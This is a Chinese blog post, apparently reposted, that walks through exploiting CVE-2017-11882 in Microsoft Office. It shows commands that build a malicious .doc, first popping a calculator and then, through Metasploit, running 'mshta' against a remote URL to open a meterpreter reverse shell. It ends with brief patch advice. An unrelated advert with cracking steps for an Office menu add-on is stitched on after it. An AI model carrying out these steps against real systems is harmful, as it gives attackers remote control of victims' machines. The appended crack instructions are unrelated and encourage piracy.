隐藏17年的Office远程代码执行漏洞(CVE-2017-11882)

Preface

  这几天关于Office的一个远程代码执行漏洞很流行,昨天也有朋友发了相关信息,于是想复现一下看看,复现过程也比较简单,主要是简单记录下。

  利用脚本Github传送地址 ,后面的参考链接都有成功的比较详细的案例了。

  主要是要用到如图中的两个脚本,example文件夹中有个doc,应该直接打开就能弹计算器了。

影响版本

  • Office 365
  • Microsoft Office 2000   
  • Microsoft Office 2003   
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

复现过程

国外最先发布的poc地址:https://github.com/embedi/CVE-2017-11882

这里我们使用的是Ridter师傅改进过的脚本:https://github.com/Ridter/CVE-2017-11882/

生成漏洞doc文件弹计算器

  生成漏洞doc文件,可以弹出计算器如下:(脚本在Github传送地址)

starnight:CVE-2017-11882 starnight$ python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
[*] Done ! output file >> test.doc <<

  用命令生成test.doc后,用Offcie 2013打开这个文件,可以看到在打开doc文件的时候,弹出计算器。

   除了可以弹计算器外,还能获取shell。

生成漏洞doc文件拿shell

  这里我们参考链接2,使用metasploit,将脚本PS_shell.rb放到metasploit exploit的某个路径下:

  我的kali下的metasploit所在路径是:/usr/share/metasploit-framework, 可以放在如下目录:(这里我们新创建一个new-exps目录存放这个脚本)

root@kali:/usr/share/metasploit-framework/modules/exploits/windows/new-exps# pwd
/usr/share/metasploit-framework/modules/exploits/windows/new-exps
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/new-exps# ls
PS_shell.rb

  这样在启动msf时就能直接使用了:

msf > use exploit/windows/new-exps/PS_shell

  漏洞利用过程:

msf > use exploit/windows/new-exps/PS_shell 
msf exploit(PS_shell) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(PS_shell) > set lhost 192.168.1.102
lhost => 192.168.1.102
msf exploit(PS_shell) > set uripath abc
uripath => abc
msf exploit(PS_shell) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.102:4444 
msf exploit(PS_shell) > [*] Using URL: http://0.0.0.0:8080/abc
[*] Local IP: http://192.168.1.102:8080/abc
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.1.102:8080/abc"

  从上面可以看出,我们要连接到这个地址:http://192.168.1.102:8080/abc

  我们需要用上面那个脚本重新生成这样一个存在漏洞的doc文件:  

starnight:CVE-2017-11882 starnight$ python Command_CVE-2017-11882.py -c "mshta http://192.168.1.102:8080/abc" -o test.doc
[*] Done ! output file >> test.doc <<

  再用Office打开这个doc,就能拿到meterpreter了:

  OK, 利用过程就这样吧。(右键在新标签页中打开图片查看更清晰哦)

 

  更多手法请参考:

    CVE-2017-11882漏洞复现和利用

 

漏洞修复

(1)下载https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882  更新补丁进行修补
 
(2)开启Windows Update功能,定期对系统进行自动更新

参考

  CVE-2017-11882利用

  CVE-2017-11882的复现、利用技巧以及修复方案

转载于:https://www.cnblogs.com/Hi-blog/p/7878054.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Office软件是我们日常办公所必须的软件,随着windows系统的不断升级,office软件也更新换代了,虽然现在的office2010及2013界面十分的华丽,不过对于很多用惯了2003的人来说还是很不方便的,很多功能区上的命令都不知道在哪。这款Classic Menu for Office 2010 and 2013可以帮我们将熟悉的Office 2003菜单和工具栏显示在Office 2010和2013中。 软件介绍: 微软Office 2010/2013的最新特性及命令,都能在这个经典界面中找到。2010/2013的功能区选项卡亦全部保留,经典界面和最新的功能区界面,尽在您手。 我们还提供完全免费、没有任何限制的家庭学生版供您使用(详见下面的"对比"), 无需费力地搜寻破解, 远离盗版, 处处安全! 您是否使用过2003/XP/2000微软Office? 如果您曾使用过2003/XP/2000微软Office,将微软Office升级至2010或2013后,您只需使用本软件,就无须任何学习培训或指导,即可享受2010和2013的各项新功能。如果您还不熟悉微软Office2010/2013,请您仔细阅读菜单,保证一学即通。从此减轻您的学习强度, 提高您的工作效率! 轻松在您企业中全面部署 在企业客户端中部署该软件非常容易,完全不必焦头烂额地寻求任何帮助。 请在此了解如何自动在企业或机构的各客户端中部署Office 2010和2013经典菜单。 安装破解方法: 1、下载解压后,运行OfficeMenu2010.exe安装程序! 2、断开网络,或者用防火墙屏蔽软件访问网络的权限! 3、打开你的Office软件,Word或者Excel都可以,要注意,这个是打开Office,而不是刚刚安装的Classic Menu for Office软件! 4、在officetab addin菜单中选择注册,用下面的序列号注册程序 姓 名: 序 列 号: (解压后可见)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值